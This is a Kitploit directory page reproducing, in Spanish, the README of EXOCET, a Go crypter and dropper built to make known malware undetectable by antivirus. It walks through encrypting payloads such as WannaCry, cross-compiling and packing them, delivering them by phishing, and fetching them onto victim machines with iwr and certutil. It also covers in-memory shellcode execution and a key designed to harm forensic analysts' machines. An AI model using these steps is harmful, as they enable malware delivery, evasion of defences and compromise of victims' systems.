Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EXOCET-AV-Evasion — EXOCET - herramienta de entrega de payloads que evade AV y es indetectable | Kitploit
Herramientas/GitHubGitHub/tanc7/exocet-av-evasion
Frameworks de ExploitsGeneración de PayloadsShellcodePost-ExplotaciónAnálisis de MalwareCriptografíaPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingGeneración de ShellcodeDesarrollo de Payloads
838147hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubtanc7/exocet-av-evasion

EXOCET-AV-Evasion

EXOCET - herramienta de entrega de payloads que evade AV y es indetectable

Ver Repositorio

EXOCET - Herramienta de entrega de payloads que evade AV, indetectable

Chang Tan
AWS Certified Cloud Practitioner and Solutions Architect Associate
[email protected]


Uso actualizado de EXOCET

Asegúrate de empaquetar tus payloads para evitar cualquier fuga de la clave del crypter y frustrar aún más a los analistas de malware. NO se requiere un empaquetador comercial de primera línea como Themida. Esto levantaría más sospechas sin algo como un certificado de firma de código. Sin un certificado de firma de código, en sistemas Windows, SmartScreen se activa automáticamente. Esta es la regla para todos los programas potencialmente no deseados o "PUPs", lo que significa que todos los payloads de malware, beacons, geacons, troyanos de acceso remoto, etc., requieren un certificado de firma de código. Tu dinero está mejor invertido en comprar un certificado de firma de código que en algún empaquetador de primera línea.

root@kitploit:~
go run exocet.go malware.exe outputmalware.go
env GOOS=windows GOARCH=amd64 build -ldflags "-s -w" outputmalware.go
upx --best outputmalware.exe

Luego, entrega el payload a tu objetivo. Usando algo como un correo de phishing, un enlace, o si ya tienes acceso de shell, entrégalo usando algo como alojar tu propio servidor localmente python -m http.server 80' y luego en la máquina que estás comprometiendo, ejecuta como un símbolo del sistema de PowerShell iwr -Uri "http://yourip/outputmalware.exe" -OutFile "NotMalware.exe" o certutil.exe -urlcache -split -f http://yourip/outputmalware.exe y luego ejecuta con outputmalware.exe



EXOCET es superior a los módulos "Evasive Payloads" de Metasploit ya que EXOCET utiliza AES-256 en modo GCM (Galois/Counter Mode). Los Payloads de Evasión de Metasploit utilizan un cifrado RC4 fácil de detectar. Mientras que RC4 puede descifrar más rápido, AES-256 es mucho más difícil de determinar la intención del malware.

Sin embargo, es posible usar Metasploit para construir un Payload Evasivo, y luego encadenarlo con EXOCET. Así que EXOCET descifrará mediante AES-256, y luego el Payload Evasivo de Metasploit se descifrará a sí mismo desde RC4.

Muy similar a mi proyecto anterior, DarkLordObama, este conjunto de herramientas está diseñado para ser un vehículo de entrega/lanzamiento, como lo hace Veil-Evasion.

Proyecto Dark Lord Obama

Sin embargo, EXOCET no está limitado a una sola base de código o plataformas que ejecuten Python. EXOCET funciona en TODAS las plataformas y arquitecturas compatibles que Go soporta.

Resumen de Exocet

EXOCET, es efectivamente un dropper de malware tipo crypter que puede reciclar payloads fácilmente detectables como WannaCry, cifrarlos usando AES-GCM (Modo Galois/Contador), que es más seguro que AES-CBC, y luego crear un archivo dropper para la mayoría de las arquitecturas y plataformas existentes.

Básicamente...

  1. Ingiere malware peligroso que ahora es detectable por los motores antivirus
  2. Luego los cifra y produce su propio archivo Go
  3. Luego ese archivo Go puede ser compilado de forma cruzada al 99% de las arquitecturas conocidas
  4. Tras la ejecución, el payload cifrado se escribe en el disco y se ejecuta inmediatamente en la línea de comandos
  5. Alternativamente, en lugar de una caída de archivo, ejecutará el shellcode reconstituido en memoria utilizando el módulo go-memexec de amenzhinsky github.com/amenzhinsky/go-memexec
  6. Un ejecutor de shellcode personalizado está en proceso, toma shellcode C ordinario y después de la transformación numérica, lo ejecutará creando un nuevo proceso después de asignar el espacio de direcciones virtuales correcto y otorgándole permisos RWX en Windows

Eso significa arquitecturas de 32 bits y 64 bits, y funciona en Linux, Windows, Macs, Unix, Android, iPhone, etc. Tomas cualquier cosa, y quiero decir CUALQUIER COSA, como el Gusano Morris de 1988 que casi colapsó Internet (que explotó una falla en el demonio de escucha fingerd en UNIX), y la conviertes en un arma cibernética viable nuevamente.

EXOCET está escrito completamente en Go.

Cómo usar

EXOCET, independientemente de qué binario uses para ejecutarlo, requiere Golang para funcionar. Por defecto, genera un archivo .go de crypter.

  1. Usuarios de Windows: Instalar Go Aquí
  2. Usuarios de Linux: ejecuta sudo apt-get update && sudo apt-get install -y golang
  3. Debes instalar los archivos fuente de EXOCET en golang go get github.com/tanc7/EXOCET-AV-Evasion
  4. Los subrequisitos también se descargarán e instalarán
  5. Para usuarios de Windows y Mac x64, los binarios precompilados están en la carpeta /bin

Para ejecutarlo

go run EXOCET.go detectablemalware.exe outputmalware.go

Se genera automáticamente una clave para ti. La clave tiene 64 caracteres de longitud y está compuesta completamente por redireccionadores de tubería de shell de bash y cmd.exe para confundir e interrumpir los intentos de fuerza bruta contra la clave, causando un comportamiento impredecible y destructivo en el dispositivo del analista forense.

Para objetivos Windows de 64 bits...

root@kitploit:~
env GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.exe outputmalware.go

Y sale un archivo outputmalware.exe file

Para objetivos macOS de 64 bits

root@kitploit:~
env GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.macho outputmalware.go

Para objetivos Linux de 64 bits

root@kitploit:~
env GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.elf outputmalware.go

Consulta esta referencia en github para tus parámetros para otros sistemas operativos como Android Referencia para Compilación Cruzada de Go

Ten en cuenta que la clave aún se puede encontrar con el comando strings, por favor usa el comando upx-ucl para empaquetar el binario y ocultar la clave.

Además, hay binarios preconstruidos que he hecho, lo que significa que solo tienes que ejecutar ./EXOCET o EXOCET-Windows.exe

Información Legal

Yo, Chang Tan, y los creadores del módulo principal y submódulos de Exocet y los paquetes que incorpora NO somos responsables del mal uso de esta herramienta. Esto es meramente una herramienta de pruebas de penetración. Tienes estrictamente prohibido implementar binarios de salida de Exocet contra sistemas protegidos no autorizados o sistemas gubernamentales protegidos no autorizados.

Soy consciente de que actores de amenazas de APT41 y el Grupo NSO han utilizado y/o adoptado código de esta herramienta, particularmente el método go-memexec. Si fuera abordado por Investigadores Federales con respecto al mal uso de esta herramienta, no reclamo responsabilidad.

Esto es lo mismo que les sucedió a los desarrolladores de Mimikatz y PowerShell Empire (quienes deprecaron su propio desarrollo al darse cuenta de su uso entre actores de amenazas). Los sucesores han retomado el desarrollo de Empire, y existen alternativas gratuitas como Covenant C2.

Demostración en vivo de EXOCET

Razón del nombre

El 4 de mayo de 1982, durante la Guerra de las Malvinas, un escuadrón de Super Etendards argentinos lanzó un misil Exocet de fabricación francesa contra el HMS Sheffield. A pesar de los intentos de la Marina Real de detener el misil, uno impactó, hundiendo el Sheffield. Ese incidente literalmente puso a Argentina en el mapa como una muestra de fuerza contra un poder colonial global.

Artículo de noticias sobre el hundimiento del HMS Sheffield

Muy similar a cómo las acciones de Onel de Guzman con el virus ILOVEYOU pusieron a Filipinas en el mapa como una amenaza cibernética.

Virus ILOVEYOU en Wikipedia

Próxima actualización, notas y ambiciones

.png)

Así que este mes, y el próximo mes, van a ser meses ocupados para mí, y habrá retrasos en la implementación de estos métodos. Pero estoy emocionado por comenzar a implementar nuevas técnicas de evasión de antivirus como...

  1. Inline hooking
  2. Ofuscación emulando BlackRota y el módulo gobfuscate
  3. Process hollowing
  4. Inyección de DLL reflectante
  5. Inyección remota de procesos
  6. Callbacks de ThreadLocalStorage
  7. Registro de Manejadores de Excepciones de Nivel Superior
  8. Empaquetado UPX personalizado

Soy un hombre muy ocupado, tengo las siguientes prioridades y me gustaría solicitar algo de ayuda, algunas solicitudes de extracción para ayudar en el proyecto. Ya que tengo las siguientes cosas que hacer

  1. Una comparecencia judicial a finales de octubre
  2. National Cyber League
  3. Clases de Contabilidad y Finanzas, Ciencias de la Computación NUNCA fue mi especialidad universitaria y en las próximas semanas tendré exámenes consecutivos
  4. Condiciones de Libertad Supervisada Federal y el FBI tratando de implicarme en nuevos delitos no probados. Tengo videos de dashcam que subí a la nube para probarlo y que estoy enviando a mis abogados. He documentado múltiples ataques contra mí, vandalismo de mi coche, mi casa, presenté informes policiales y contra-informes y estaré construyendo mi caso para presentar una demanda federal. Uno de los perpetradores, que arrancó el parachoques delantero de mi coche, ha sido arrestado.
  5. Un proyecto privado que involucra interacción con la CoinGeckoAPI
  6. Dirigir cryptoscopeinitiative.org, una Organización Sin Fines de Lucro 501c3 por presentar
  7. Enseñar tres clases en línea sobre Desarrollo de Exploits

¡Próxima actualización! ¡Ejecución directa de shellcode cifrado! (Implementado en versiones de prueba, aún no publicado)

Necesito un poco de ayuda, porque implementé con éxito CGO para ejecutar shellcode cifrado pero está lanzando violaciones de acceso a memoria con estado de salida 0xc0000005. No debería ser nada relacionado con DEP (Prevención de Ejecución de Datos) porque el archivo CGOTest/working-template-shellcode-executor.go sí se ejecutó.

Problema Descubierto

Resulta que VirtualAlloc debe ser llamado desde kernel32.dll y ntdll.dll para hacer que la página de memoria donde aterriza el shellcode sea legible, escribible y ejecutable, en otras palabras, activar PAGE_EXECUTE_READWRITE. Lee la Nota sobre el Problema de Violación de Acceso a Memoria a continuación.

Una vez que resuelva esto, CGO fue un dolor de cabeza de implementar, ahora podemos crear crypters que ejecuten ENSAMBLADOR EN LÍNEA. Lo cual se consideraba una imposibilidad hasta ahora.

Ten en cuenta que esto requiere que Golang y la cadena de herramientas MinGW estén instalados en Windows, ejecutando y generando el shellcode en Windows. La razón es porque CGO no puede ser compilado de forma cruzada como nuestros otros módulos de EXOCET. Para instalar la cadena de herramientas, debes ir a https://www.msys2.org/ y seguir la guía. Luego debes agregar gcc a tus variables de entorno en Windows

Paso 1: Genera shellcode, esto podría ser de payloads Meterpreter de msfvenom, Beacons de Cobalt Strike, o tu propio shellcode personalizado en formato compatible con C

Paso 2: Copia solo los bytes del shellcode, excluyendo las comillas, en un archivo de texto como sc.txt

Paso 3: Tu archivo de shellcode debería verse así. Shellcode en bruto

Step 4: Now run the command go run exocet-shellcode-exec.go sc.txt shellcodetest.go KEY

Paso 5: Puedes intentar ejecutarlo, pero te encontrarás con errores de violación de acceso a memoria por alguna razón, en lo que aún estoy trabajando

Nota sobre el Problema de Violación de Acceso a Memoria

Aparentemente, además de las principales limitaciones de CGO que prohíben o frustran drásticamente la compilación cruzada, el problema es que el shellcode que queremos ejecutar está aterrizando en una sección de memoria (analizada en WinDBG x64) que no es RWX. En otras palabras, a menos que escribamos código C que permita explícitamente la ejecución en memoria del shellcode, siempre lanzará errores de violación de acceso.

El otro método, que observé de otros desarrolladores de módulos Go rudimentarios https://gist.github.com/mgeeky/bb0fd5652b234fbd1c7630d7e5c8542d, es que usan la API de Windows de Go para interactuar con ntdll.dll y kernel32.dll para llamar a VirtualAlloc y especificar áreas de páginas de memoria RWX. Este método funciona mejor, pero parece que el shellcode debe estar en formato transformado-numéricamente solo para que funcione.

Todavía estoy trabajando en esto, chicos. Puede que combine múltiples lenguajes de programación para escribir un módulo de ejecución de shellcode adecuado

Nota sobre Chips Apple M1 para binarios precompilados

Desafortunadamente, estoy encontrando errores al hacer un binario precompilado para MacBooks con los nuevos CPUs M1. Puede ser un problema con mi instalación de Golang

root@kitploit:~
┌──(root💀kali)-[/opt/EXOCET-AV-Evasion]
└─# GOOS=darwin GOARCH=arm64 go build exocet.go 
# command-line-arguments
/usr/lib/go-1.15/pkg/tool/linux_amd64/link: running gcc failed: exit status 1
/tmp/go-link-477718799/go.o: file not recognized: file format not recognized
collect2: error: ld returned 1 exit status

De cualquier manera, aún necesitas Golang para compilar o compilar de forma cruzada el malware a la plataforma que estás atacando.

Descargar herramienta